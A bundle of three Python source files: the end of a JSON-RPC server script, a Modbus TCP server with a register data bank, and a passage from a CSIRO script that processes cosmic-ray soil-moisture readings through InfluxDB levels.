By default, will start the server on localhost on a system assigned port
in the main thread. Execution of the main thread will stay in the server
main loop until interrupted. To run the server in a separate process, and
thus allow the stop_server method to be called, set newprocess = True. This
also allows the port number to be returned.'''
global _proc
if _proc:
raise RuntimeError('server is already running')
httpd = make_server(host, port, application)
port = httpd.server_address[1]
print("Listening on port %s" % port)
if newprocess:
_proc = Process(target=httpd.serve_forever)
_proc.daemon = True
_proc.start()
else:
httpd.serve_forever()
return port
def stop_server():
global _proc
_proc.terminate()
_proc = None
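# Illustrative usage of the two helpers above (not executed on import):
#
#   port = start_server(host='localhost', port=0, newprocess=True)
#   # ... issue JSON-RPC POST requests against http://localhost:<port>/ ...
#   stop_server()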
def process_async_cli(input_file_path, output_file_path, token):
exit_code = 0
with open(input_file_path) as data_file:
req = json.load(data_file)
if 'version' not in req:
req['version'] = '1.1'
if 'id' not in req:
req['id'] = str(_random.random())[2:]
ctx = MethodContext(application.userlog)
if token:
user = application.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
if 'context' in req:
ctx['rpc_context'] = req['context']
ctx['CLI'] = 1
ctx['module'], ctx['method'] = req['method'].split('.')
prov_action = {'service': ctx['module'], 'method': ctx['method'],
'method_params': req['params']}
ctx['provenance'] = [prov_action]
resp = None
try:
resp = application.rpc_service.call_py(ctx, req)
except JSONRPCError as jre:
trace = jre.trace if hasattr(jre, 'trace') else None
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': jre.code,
'name': jre.message,
'message': jre.data,
'error': trace}
}
except Exception:
trace = traceback.format_exc()
resp = {'id': req['id'],
'version': req['version'],
'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error occurred',
'error': trace}
}
if 'error' in resp:
exit_code = 500
with open(output_file_path, "w") as f:
f.write(json.dumps(resp, cls=JSONObjectEncoder))
return exit_code
if __name__ == "__main__":
if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
os.path.isfile(sys.argv[1])):
token = None
if len(sys.argv) == 4:
if os.path.isfile(sys.argv[3]):
with open(sys.argv[3]) as token_file:
token = token_file.read()
else:
token = sys.argv[3]
sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
try:
opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
except GetoptError as err:
# print help information and exit:
print(str(err)) # will print something like "option -a not recognized"
sys.exit(2)
port = 9999
host = 'localhost'
for o, a in opts:
if o == '--port':
port = int(a)
elif o == '--host':
host = a
print("Host set to %s" % host)
else:
assert False, "unhandled option"
start_server(host=host, port=port)
# print("Listening on port %s" % port)
# httpd = make_server( host, port, application)
#
# httpd.serve_forever()
|
server.py
|
import constants as const
import utils as mu
import socket
import struct
import settings
from threading import Lock, Thread
# for python2 compatibility
try:
from socketserver import BaseRequestHandler, ThreadingTCPServer
except ImportError:
from SocketServer import BaseRequestHandler, ThreadingTCPServer
class DataBank:
""" Data class for thread safe access to bits and words space
words space is always kept in bytes the reason for this every
vendor of PLC or other hardware store the data inconsistently
so a 16 bit register could have two 8bit ascii characters with
10 registers strung to together to hold 20 char string then the
next register holding 16 bit float type the next register two
registers holder 32 bit integer. There is no way to tell what data
type is being sent so the code was refactored to
stop unpacking/converting from byte stream to integer.
Several classmethods have been added to convert bytes to
a respective python data type but you need to know the data type
being stored in the register.
Need to write several more access and write methods to deal with
signed integer, float and double types"""
bits_lock = Lock()
bits = [False] * 0x10000
words_lock = Lock()
words = [struct.pack('>H', 0)] * 0x10000
@classmethod
def clear_registers(cls):
with cls.words_lock:
cls.words = [struct.pack('>H', 0)] * 0x10000
with cls.bits_lock:
cls.bits = [False] * 0x10000
return True
@classmethod
def get_ascii(cls, pstart, pend):
with cls.words_lock:
if (pstart>=0 and pend<=65535) and (pend >=pstart):
_ascii = b''.join(cls.words[pstart:pend]).decode('ascii')
##print(_ascii)
return _ascii
else:
return None
@classmethod
def get_bits(cls, address, number=1):
with cls.bits_lock:
if (address >= 0) and (address + number <= len(cls.bits)):
return cls.bits[address: number + address]
else:
return None
@classmethod
def get_double(cls, pstart, pend):
with cls.words_lock:
if (pstart>=0 and pend<=65535) and (pstart+3 == pend):
# four consecutive 16 bit registers hold one big-endian double
return struct.unpack('>d', b''.join(cls.words[pstart:pend+1]))[0]
else:
return None
@classmethod
def get_int2(cls, address):
with cls.words_lock:
if (address>=0 and address<=65535):
return struct.unpack('>H',cls.words[address])[0]
else:
return None
@classmethod
def get_int4(cls, pstart):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535):
# two consecutive registers hold one big-endian unsigned 32 bit integer
return struct.unpack('>I', b''.join(cls.words[pstart:pstart+2]))[0]
else:
return None
@classmethod
def get_float4(cls, pstart):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535):
# two consecutive registers hold one big-endian 32 bit float
return struct.unpack('>f', b''.join(cls.words[pstart:pstart+2]))[0]
else:
return None
@classmethod
def get_words(cls, address, number=1):
with cls.words_lock:
if (address >= 0) and (address + number <= len(cls.words)):
return cls.words[address: number + address]
else:
return None
@classmethod
def set_ascii(cls, pstart, pend, pvalue):
if (pstart>=0 and pend<=65535) and ( (pend-pstart) >= (len(pvalue)/2) ):
_c_char = mu.ascii_to_char_bit(pvalue)
if len(_c_char)> (pend-pstart):
return False
_i = pstart
with cls.words_lock:
for _char in _c_char:
cls.words[_i]= _char
_i = _i+1
return True
return False
@classmethod
def set_bits(cls, address, bit_list):
with cls.bits_lock:
if (address >= 0) and (address + len(bit_list) <= len(cls.bits)):
cls.bits[address: address + len(bit_list)] = bit_list
if settings.SERVER_PRINT_REGISTER_CHANGES:
print("Coil Address from %s to %s, boolean values: %s"
% (address, address + len(bit_list) - 1,
', '.join([str(i) for i in bit_list])
)
)
return True
else:
return False
@classmethod
def set_clear_words(cls, pstart, pend):
with cls.words_lock:
if (pstart>=0 and pend<=65535) and (pstart <= pend):
i = pstart
while i <= pend:
cls.words[i] = struct.pack('>H', 0)
i = i + 1
return True
else:
return False
@classmethod
def set_int2(cls, address, pvalue):
with cls.words_lock:
if (address>=0 and address<=65535 and pvalue <= 65535):
cls.words[address] = struct.pack('>H', pvalue)
return True
else:
return False
@classmethod
def set_int4(cls, pstart, pvalue):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535) and (pvalue <= 4294967295):
# split the 32 bit value across two consecutive 16 bit registers
packed = struct.pack('>I', pvalue)
cls.words[pstart] = packed[0:2]
cls.words[pstart+1] = packed[2:4]
return True
else:
return False
@classmethod
def set_float4(cls, pstart, pvalue):
with cls.words_lock:
if (pstart>=0 and pstart+1<=65535) and isinstance(pvalue, float):
# split the 32 bit float across two consecutive 16 bit registers
packed = struct.pack('>f', pvalue)
cls.words[pstart] = packed[0:2]
cls.words[pstart+1] = packed[2:4]
return True
else:
return False
@classmethod
def set_words(cls, address, word_list):
with cls.words_lock:
#if (address >= 0) and (address + len(word_list) <= len(cls.words)):
if (address>=0 and address<=65535):
#ddcls.words[address: address + len(word_list)] = word_list
cls.words[address]=word_list
if settings.SERVER_PRINT_REGISTER_CHANGES:
print(word_list)
try:
print("Address: %s value: %s" % (address, (b''.join(word_list)).decode('ascii')))
except Exception:
print("Address: %s value: %s" % (address, struct.unpack('>H', word_list)))
return True
else:
return False
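# Illustrative round trip through the word space (assumes the byte-oriented
# accessors above; not executed at import time):
#
#   DataBank.set_int2(100, 1234)      # one 16 bit register
#   DataBank.get_int2(100)            # -> 1234
#   DataBank.set_int4(200, 70000)     # spans registers 200 and 201
#   DataBank.get_int4(200)            # -> 70000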
class ModbusServer(object):
"""Modbus TCP server"""
class ModbusService(BaseRequestHandler):
bytes_to_read = 2
def recv_all(self, size):
if hasattr(socket, "MSG_WAITALL"):
data = self.request.recv(size, socket.MSG_WAITALL)
else:
# Windows lacks MSG_WAITALL
data = b''
while len(data) < size:
data += self.request.recv(size - len(data))
return data
def handle(self):
while True:
rx_head = self.recv_all(7)
# close connection if no standard 7 bytes header
if not (rx_head and len(rx_head) == 7):
break
# decode header
(rx_hd_tr_id, rx_hd_pr_id,
rx_hd_length, rx_hd_unit_id) = struct.unpack('>HHHB', rx_head)
# close connection if frame header content inconsistency
if not ((rx_hd_pr_id == 0) and (2 < rx_hd_length < 256)):
break
# receive body
rx_body = self.recv_all(rx_hd_length - 1)
# close connection if lack of bytes in frame body
if not (rx_body and (len(rx_body) == rx_hd_length - 1)):
break
# body decode: function code
rx_bd_fc = struct.unpack('B', rx_body[0:1])[0]
# close connection if function code is inconsistent
if rx_bd_fc > 0x7F:
break
# default except status
exp_status = const.EXP_NONE
# functions Read Coils (0x01) or Read Discrete Inputs (0x02)
if rx_bd_fc in (const.READ_COILS, const.READ_DISCRETE_INPUTS):
(b_address, b_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested bits
if 0x0001 <= b_count <= 0x07D0:
bits_l = DataBank.get_bits(b_address, b_count)
if bits_l:
# allocate bytes list
b_size = int(b_count / 8)
b_size += 1 if (b_count % 8) else 0
bytes_l = [0] * b_size
# populate bytes list with data bank bits
for i, item in enumerate(bits_l):
if item:
byte_i = int(i/8)
bytes_l[byte_i] = mu.set_bit(bytes_l[byte_i], i % 8)
# format body of frame with bits
tx_body = struct.pack('BB', rx_bd_fc, len(bytes_l))
# add bytes with bits
for byte in bytes_l:
tx_body += struct.pack('B', byte)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# functions Read Holding Registers (0x03) or Read Input Registers (0x04)
elif rx_bd_fc in (const.READ_HOLDING_REGISTERS, const.READ_INPUT_REGISTERS):
(w_address, w_count) = struct.unpack('>HH', rx_body[1:])
# check quantity of requested words
if 0x0001 <= w_count <= 0x007D:
words_l = DataBank.get_words(w_address, w_count)
if words_l:
# format body of frame with words
tx_body = struct.pack('BB', rx_bd_fc, w_count * 2)
for word in words_l:
tx_body += word
#tx_body += struct.pack('>H', word)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Single Coil (0x05)
elif rx_bd_fc == const.WRITE_SINGLE_COIL:
(b_address, b_value) = struct.unpack('>HH', rx_body[1:])
f_b_value = bool(b_value == 0xFF00)
if DataBank.set_bits(b_address, [f_b_value]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_value)
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Single Register (0x06)
elif rx_bd_fc == const.WRITE_SINGLE_REGISTER:
(w_address, w_value) = struct.unpack('>HH', rx_body[1:])
#w_address = struct.unpack('>H', rx_body[1:3])
#w_value =
print(rx_body[3:5])
if DataBank.set_words(w_address, rx_body[3:5]):
# send write ok frame
#tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_value)
tx_body = struct.pack('>BH', rx_bd_fc, w_address ) + rx_body[3:5]
else:
exp_status = const.EXP_DATA_ADDRESS
# function Write Multiple Coils (0x0F)
elif rx_bd_fc == const.WRITE_MULTIPLE_COILS:
(b_address, b_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated coils
if (0x0001 <= b_count <= 0x07B0) and (byte_count >= (b_count/8)):
# allocate bits list
bits_l = [False] * b_count
# populate bits list with bits from rx frame
for i, item in enumerate(bits_l):
b_bit_pos = int(i/8)+6
b_bit_val = struct.unpack('B', rx_body[b_bit_pos:b_bit_pos+1])[0]
bits_l[i] = mu.test_bit(b_bit_val, i % 8)
# write words to data bank
if DataBank.set_bits(b_address, bits_l):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, b_address, b_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
# function Write Multiple Registers (0x10)
elif rx_bd_fc == const.WRITE_MULTIPLE_REGISTERS:
(w_address, w_count, byte_count) = struct.unpack('>HHB', rx_body[1:6])
# check quantity of updated words
if (0x0001 <= w_count <= 0x007B) and (byte_count == w_count * 2):
# allocate words list
words_l = [0] * w_count
# populate words list with words from rx frame
for i, item in enumerate(words_l):
w_offset = i * 2 + 6
# words_l[i] = struct.unpack('>H', rx_body[w_offset:w_offset + 2])[0]
# write words to data bank
print(w_address)
print(rx_body[w_offset:w_offset + self.bytes_to_read])
if DataBank.set_words(w_address+i, rx_body[w_offset:w_offset + self.bytes_to_read]):
# send write ok frame
tx_body = struct.pack('>BHH', rx_bd_fc, w_address, w_count)
else:
exp_status = const.EXP_DATA_ADDRESS
else:
exp_status = const.EXP_DATA_VALUE
else:
exp_status = const.EXP_ILLEGAL_FUNCTION
# check exception
if exp_status != const.EXP_NONE:
# format body of frame with exception status
tx_body = struct.pack('BB', rx_bd_fc + 0x80, exp_status)
# build frame header
tx_head = struct.pack('>HHHB', rx_hd_tr_id, rx_hd_pr_id, len(tx_body) + 1, rx_hd_unit_id)
# send frame
self.request.send(tx_head + tx_body)
self.request.close()
def __init__(self, host='localhost', port=const.MODBUS_PORT, no_block=False, ipv6=False, register_width=16):
"""Constructor
Modbus server constructor.
:param host: hostname or IPv4/IPv6 server address (optional)
:type host: str
:param port: TCP port number (optional)
:type port: int
:param no_block: set no block mode; in this mode start() returns immediately (optional)
:type no_block: bool
:param ipv6: use ipv6 stack
:type ipv6: bool
:param register_width: how many bits the server expects for each word sent; either 16 (default) or 32
:type register_width: integer
"""
# public
self.host = host
self.port = port
self.no_block = no_block
self.ipv6 = ipv6
self.register_width = register_width
# private
self._running = False
self._service = None
self._serve_th = None
def start(self):
"""Start the server.
Do nothing if server is already running.
This function will block if no_block is not set to True.
"""
if not self.is_run:
# set class attribute
ThreadingTCPServer.address_family = socket.AF_INET6 if self.ipv6 else socket.AF_INET
ThreadingTCPServer.daemon_threads = True
# init server
self._service = ThreadingTCPServer((self.host, self.port), self.ModbusService, bind_and_activate=False)
# set socket options
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._service.socket.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# TODO test no_delay with bench
self._service.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# bind and activate
self._service.server_bind()
self._service.server_activate()
# serve request
if self.no_block:
self._serve_th = Thread(target=self._serve)
self._serve_th.daemon = True
self._serve_th.start()
else:
self._serve()
def stop(self):
"""Stop the server.
Do nothing if server is already not running.
"""
if self.is_run:
self._service.shutdown()
self._service.server_close()
@property
def is_run(self):
"""Return True if server running.
"""
return self._running
def _serve(self):
try:
self._running = True
self._service.serve_forever()
except:
self._service.server_close()
raise
finally:
self._running = False
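# Minimal usage sketch (illustrative; port 5020 chosen arbitrarily to avoid needing
# root for the default Modbus port 502):
#
#   server = ModbusServer(host='0.0.0.0', port=5020, no_block=True)
#   server.start()            # returns immediately because no_block=True
#   DataBank.set_bits(0, [True])
#   ...
#   server.stop()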
|
cosmoz_process_levels.py
|
#!/bin/python3
# -*- coding: utf-8 -*-
"""
Copyright 2019 CSIRO Land and Water
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import sys
from multiprocessing import Process, Pool, Queue
import math
from datetime import time as d_time, datetime, timedelta, timezone
from influxdb import InfluxDBClient
from pymongo import MongoClient
from sortedcontainers import SortedList
from .influx_cached_writer import AccumCacheInfluxWriter
from .utils import datetime_to_isostring, isostring_to_datetime
from ._influx_db_config import config as influx_config
from ._mongo_db_config import config as mongodb_config
influx_client = InfluxDBClient(
influx_config['DB_HOST'], int(influx_config['DB_PORT']),
influx_config['DB_USERNAME'], influx_config['DB_PASSWORD'],
influx_config['DB_NAME'], timeout=30)
THIRTY_YEARS = timedelta(days=365 * 30)
TEN_YEARS = timedelta(days=365 * 10)
ONE_YEAR = timedelta(days=365)
def level3_to_level4(site_no=1, start_time=None, backprocess=None, drop_old=False):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
result = influx_client.query("""\
SELECT "time", site_no, soil_moist, effective_depth, rainfall
--FROM "level3_temp"
FROM "level3"
WHERE "time" > '{}' AND flag='0' AND site_no='{}'""".format(time_string, site_no))
points = result.get_points()
if drop_old:
influx_client.query(
"DROP SERIES FROM level4 WHERE site_no='{}';".format(site_no),
method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
for p in points:
this_datetime = isostring_to_datetime(p['time'])
three_h_ago = datetime_to_isostring(this_datetime - timedelta(hours=3, seconds=1))
three_h_fwd = datetime_to_isostring(this_datetime + timedelta(hours=3, seconds=1))
r2 = influx_client.query("""\
SELECT MEAN("soil_moist") as soil_moist_filtered, MEAN("effective_depth") as depth_filtered
FROM (SELECT soil_moist, effective_depth FROM "level3"
WHERE "time" >= '{}' AND "time" <= '{}' AND flag='0' AND site_no='{}'
LIMIT 7)""".format(three_h_ago, three_h_fwd, site_no))
p2 = r2.get_points()
try:
avgs = next(p2)
soil_moist_filtered = avgs['soil_moist_filtered']
depth_filtered = avgs['depth_filtered']
except (StopIteration, KeyError):
soil_moist_filtered = p['soil_moist']
depth_filtered = p['effective_depth']
json_body = {
"measurement": "level4",
#"measurement": "level4_temp",
"tags": {
"site_no": p['site_no'],
},
"time": p['time'],
"fields": {
"soil_moist": float(p['soil_moist']),
"effective_depth": float(p['effective_depth']),
"rainfall": float(p['rainfall']),
"soil_moist_filtered": soil_moist_filtered,
"depth_filtered": depth_filtered
}
}
writer.write_point(json_body)
def level2_to_level3(mongo_client, site_no=1, start_time=None, backprocess=None, drop_old=False):
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
all_stations = mdb.all_stations
this_site = all_stations.find_one({'site_no': site_no})
try:
alternate_algorithm = this_site["alternate_algorithm"]
except LookupError:
alternate_algorithm = None
sandy_a = 1216036430.0
sandy_b = -3.272
result = influx_client.query("""\
SELECT "time", site_no, wv_corr, corr_count, rain, flag as level2_flag
--SELECT "time", site_no, wv_corr, corr_count, flag as level2_flag
--FROM "level2_temp"
FROM "level2"
WHERE "time" > '{}' AND site_no='{}'""".format(time_string, site_no))
points = result.get_points()
if drop_old:
influx_client.query("DROP SERIES FROM level3 WHERE site_no='{}';".format(site_no), method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
for p in points:
wv_corr = float(p['wv_corr'])
corr_count = float(p['corr_count'])
n0_cal = float(this_site['n0_cal'].to_decimal())
bulk_density = float(this_site['bulk_density'].to_decimal())
lattice_water_g_g = this_site['lattice_water_g_g'].to_decimal()
soil_organic_matter_g_g = this_site['soil_organic_matter_g_g'].to_decimal()
lattice_soil_organic_sum = float(lattice_water_g_g + soil_organic_matter_g_g)
if alternate_algorithm and alternate_algorithm == "sandy":
if wv_corr == 1.0:
flag = 5
elif corr_count > (3.0 * n0_cal):
flag = 3
elif corr_count < (0.5 * n0_cal):
flag = 2
else:
flag = int(p['level2_flag'])
corrected_moist_val = sandy_a * (corr_count ** sandy_b)
else:
if wv_corr == 1.0:
flag = 5
elif corr_count > n0_cal:
flag = 3
elif corr_count < (0.4 * n0_cal):
flag = 2
else:
flag = int(p['level2_flag'])
corrected_moist_val = (0.0808 / ((corr_count / n0_cal) - 0.372) - 0.115 - lattice_soil_organic_sum) * bulk_density
#((0.0808 / ((l2.CorrCount / a.N0_Cal) - 0.372) - 0.115 - a.LatticeWater_g_g - a.SoilOrganicMatter_g_g) * a.BulkDensity) * 100
soil_moisture = corrected_moist_val * 100.0
#5.8 / ( ((a.LatticeWater_g_g + a.SoilOrganicMatter_g_g) * a.BulkDensity) + ( (0.0808 / ( (l2.CorrCount / a.N0_Cal) - 0.372) - 0.115 - a.LatticeWater_g_g - a.SoilOrganicMatter_g_g) * a.BulkDensity ) + 0.0829) AS EffectiveDepth,
effective_depth = 5.8 / ((lattice_soil_organic_sum * bulk_density) + corrected_moist_val + 0.0829)
json_body = {
"measurement": "level3",
#"measurement": "level3_temp",
"tags": {
"site_no": p['site_no'],
"flag": flag,
},
"time": p['time'],
"fields": {
"soil_moist": soil_moisture,
"effective_depth": effective_depth,
"rainfall": float(p['rain']) * 0.2
}
}
writer.write_point(json_body)
def level1_to_level2(mongo_client, site_no=1, start_time=None, backprocess=None, drop_old=False):
emulate_old_version = False
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
mdb = getattr(mongo_client, mongodb_config['DB_NAME'])
all_stations_collection = mdb.all_stations
this_site = all_stations_collection.find_one({'site_no': site_no})
result = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, pressure2, external_temperature, external_humidity, rain, flag as level1_flag
FROM "level1"
WHERE "time" > '{}' AND site_no=$s""".format(time_string), bind_params={"s": str(site_no)})
points = result.get_points()
if drop_old:
influx_client.query("DROP SERIES FROM level2 WHERE site_no=$s;", bind_params={"s": str(site_no)}, method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
for p in points:
count = p['count']
pressure1 = float(p['pressure1'])
pressure2 = float(p['pressure2'])
if pressure2 != 0:
press_corr = math.exp(float(this_site['beta'].to_decimal()) * (pressure2 - float(this_site['ref_pressure'].to_decimal())))
elif pressure1 != 0:
press_corr = math.exp(float(this_site['beta'].to_decimal()) * (pressure1 - float(this_site['ref_pressure'].to_decimal())))
else:
press_corr = 1.0
this_datetime = isostring_to_datetime(p['time'])
this_day_start = datetime_to_isostring(this_datetime.date())
this_day_end = datetime_to_isostring(datetime.combine(this_datetime.date(), d_time(11, 59, 59, 999999, tzinfo=this_datetime.tzinfo)))
this_hour_start = datetime_to_isostring(datetime.combine(this_datetime.date(), d_time(this_datetime.hour, 0, 0, 0, tzinfo=this_datetime.tzinfo)))
this_hour_end = datetime_to_isostring(datetime.combine(this_datetime.date(), d_time(this_datetime.hour, 59, 59, 999999, tzinfo=this_datetime.tzinfo)))
external_temperature = float(p['external_temperature'])
external_humidity = float(p['external_humidity'])
# if external temperature or external humidity is zero, we will need to get the data from SILO.
if external_temperature == 0 or external_humidity == 0:
silo_req = influx_client.query("""SELECT LAST(*) FROM "silo_data" WHERE "time" >= '{}' AND "time" <= '{}' AND site_no='{}'""".format(this_day_start, this_day_end, site_no))
try:
sp = next(silo_req.get_points())
average_temperature = float(sp['last_average_temperature'])
average_humidity = float(sp['last_average_humidity'])
except (StopIteration, ValueError, KeyError):
average_temperature = None
average_humidity = None
else:
average_temperature = None
average_humidity = None
if external_temperature != 0 and external_humidity != 0:
                # If ExternalTemperature AND ExternalHumidity (from the Level1View view) both have valid data, use them in the WVCorr equation.
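                # Note: the inner term appears to compute absolute humidity (g/m^3) from a
                # Tetens-style saturation vapour pressure, giving the usual cosmic-ray
                # neutron water-vapour correction of 1 + 0.0054 * absolute_humidity.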
wv_corr_store = 1+0.0054*((2165*((0.6108*math.exp((17.27*external_temperature)/(external_temperature+237.3)))*(external_humidity/100.0)))/(external_temperature+273.16)-0)
wv_corr_use = wv_corr_store
elif average_humidity is not None:
                # Otherwise, if AverageTemperature AND AverageHumidity (from the SiloData table) have valid data, use them in the WVCorr equation.
use_temp = average_temperature if average_temperature is not None else 0.0
wv_corr_use = 1+0.0054*((2165*((0.6108*math.exp((17.27*use_temp)/(use_temp+237.3)))*(average_humidity/100.0)))/(use_temp+273.16)-0)
if emulate_old_version:
if average_temperature is not None:
wv_corr_store = wv_corr_use
else:
wv_corr_store = 1.0
else:
wv_corr_store = wv_corr_use
else:
# Finally, use either external OR average values, or zero
use_humidity = average_humidity if external_humidity == 0 else external_humidity
use_temp = average_temperature if external_temperature == 0 else external_temperature
if use_humidity is None or use_humidity == 0:
wv_corr_use = 1.0
else:
if use_temp is None:
use_temp = 0.0 # Use the actual zero temp in the calculation
wv_corr_use = 1+0.0054*((2165*((0.6108*math.exp((17.27*use_temp)/(use_temp+237.3)))*(use_humidity/100.0)))/(use_temp+273.16)-0)
if emulate_old_version:
wv_corr_store = 1.0 # Store this, to match the old way the system stored wv_corr
else:
wv_corr_store = wv_corr_use
            # If we can match the record's timestamp (to the hour) to one in the Intensity table, use that Intensity value in the IntensityCorr equation.
intensity_req = influx_client.query("""SELECT * FROM "intensity" WHERE "time" >= '{}' AND "time" <= '{}' AND site_no='{}'""".format(this_hour_start, this_hour_end, site_no))
try:
intensities = list(intensity_req.get_points())
assert len(intensities) > 0
if len(intensities) > 1:
print("Found too many intensity records in a single hour period.")
intensity_p = intensities[0]
#int_key = "intensity"
except (StopIteration, AssertionError):
# no intensity to the nearest hour
                # Otherwise, if we can find an intensity record at or before this record's timestamp, use that Intensity value in the IntensityCorr equation.
if emulate_old_version:
intensity_req = influx_client.query("""SELECT FIRST("intensity") AS "intensity", "bad_data_flag" FROM "intensity" WHERE "time" <= '{}' AND site_no='{}'""".format(p['time'], site_no))
#int_key = "first_intensity"
else:
intensity_req = influx_client.query("""SELECT LAST("intensity") AS "intensity", "bad_data_flag" FROM "intensity" WHERE "time" <= '{}' AND site_no='{}'""".format(p['time'], site_no))
#int_key = "last_intensity"
try:
intensity_p = next(intensity_req.get_points())
except StopIteration:
intensity_req = influx_client.query("""SELECT FIRST("intensity") AS "intensity", "bad_data_flag" FROM "intensity" WHERE "time" >= '{}' AND site_no='{}'""".format(p['time'], site_no))
try:
intensity_p = next(intensity_req.get_points())
#int_key = "first_intensity"
except Exception:
intensity_p = None
#int_key = None
if intensity_p and "intensity" in intensity_p:
use_intensity = float(intensity_p["intensity"])
if use_intensity == 0.0: # prevent div by zero
intensity_corr = 1.0
else:
intensity_corr = use_intensity / float(this_site['ref_intensity'].to_decimal())
else:
intensity_corr = 1.0
latit_scaling = this_site['latit_scaling'].to_decimal()
elev_scaling = this_site['elev_scaling'].to_decimal()
try:
corr_count = (float(count)*wv_corr_use*press_corr/intensity_corr)/float(latit_scaling/elev_scaling)
except ZeroDivisionError:
print("count:", p["count"])
print("latit_scaling:", latit_scaling)
print("elev_scaling:", elev_scaling)
print("wv_corr_use:", wv_corr_use)
print("intensity_corr:", intensity_corr)
raise
json_body = {
"measurement": "level2",
#"measurement": "level2_temp",
"tags": {
"site_no": p['site_no'],
"flag": int(p['level1_flag']),
},
"time": p['time'],
"fields": {
"count": int(count),
"press_corr": press_corr,
"wv_corr": wv_corr_store,
"intensity_corr": intensity_corr,
"corr_count": corr_count,
"rain": float(p['rain']),
}
}
writer.write_point(json_body)
def is_duplicate(site_no, record1, record2, table):
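    """Return True when record1 matches the record stored in `table` at record2's timestamp.
    record2 may be a datetime, an ISO string, or an already-fetched point dict;
    the comparison ignores the "time", "site_no" and "flag" keys."""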
if isinstance(record2, datetime):
record2 = datetime_to_isostring(record2)
if isinstance(record2, str):
result = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag as raw_flag
FROM "{}"
WHERE "time" = '{}' AND site_no=$s;""".format(table, record2), bind_params={"s": str(site_no)})
points = result.get_points()
try:
record2 = next(iter(points))
except (IndexError, StopIteration):
return False
different = {}
for key, val in record1.items():
if key in ("time", "site_no", "flag"):
continue
if key in record2:
val2 = record2[key]
if val != val2:
different[key] = (val, val2)
return len(different) < 1
def raw_to_level1(site_no=1, start_time=None, backprocess=None, drop_old=False):
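    """Copy raw_values into the "level1" measurement for one site, skipping
    records that duplicate another raw record from the preceding 29 minutes
    and flagging low battery (flag 4) or counts that jump more than 20%
    relative to the previous count (flag 1)."""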
if start_time is None:
start_time = datetime.now().astimezone(timezone.utc)
if backprocess is None:
backprocess = TEN_YEARS
back_time = start_time - backprocess
time_string = datetime_to_isostring(back_time)
a_res = influx_client.query("""SELECT "time", "count", site_no FROM "raw_values" WHERE site_no=$s""", bind_params={"s": str(site_no)})
all_mapped = {}
for p in a_res.get_points():
all_mapped[isostring_to_datetime(p["time"])] = p
all_times = SortedList(all_mapped.keys())
result = influx_client.query("""\
SELECT "time", site_no, "count", pressure1, internal_temperature, internal_humidity, battery, tube_temperature, tube_humidity, rain, vwc1, vwc2, vwc3, pressure2, external_temperature, external_humidity, flag as raw_flag
FROM "raw_values"
WHERE "time" > '{}' AND site_no=$s;""".format(time_string), bind_params={"s": str(site_no)})
points = result.get_points()
result2 = influx_client.query("""\
SELECT DIFFERENCE("count") as count_diff
FROM "raw_values"
WHERE "time" > '{}' AND site_no=$s""".format(time_string), bind_params={"s": str(site_no)})
points2 = result2.get_points()
if drop_old:
influx_client.query("DROP SERIES FROM level1 WHERE site_no=$s;", bind_params={"s":str(site_no)}, method='POST')
with AccumCacheInfluxWriter(influx_client, cache_length=10) as writer:
try:
#skip the first p, because it doesn't have a corresponding diff
_ = next(points)
except StopIteration:
return
#influx_client.query("DROP SERIES FROM level1_temp WHERE site_no='{}';".format(site_no), method='POST')
for p in points:
time_str = p['time']
at_time = isostring_to_datetime(time_str)
count = p['count']
dup_back_time = at_time - timedelta(minutes=29.0)
possible_duplicates_times = list(all_times.irange(dup_back_time, at_time, inclusive=(True, False)))
if len(possible_duplicates_times) > 0:
for dt in possible_duplicates_times:
dc = all_mapped[dt]['count']
dtstring = all_mapped[dt]['time']
if dc == count:
im_duplicate = is_duplicate(site_no, p, dtstring, 'raw_values')
if im_duplicate:
break
else:
im_duplicate = False
if im_duplicate:
print("Skipping time {} at site {} because it is a duplicate.".format(time_str, site_no))
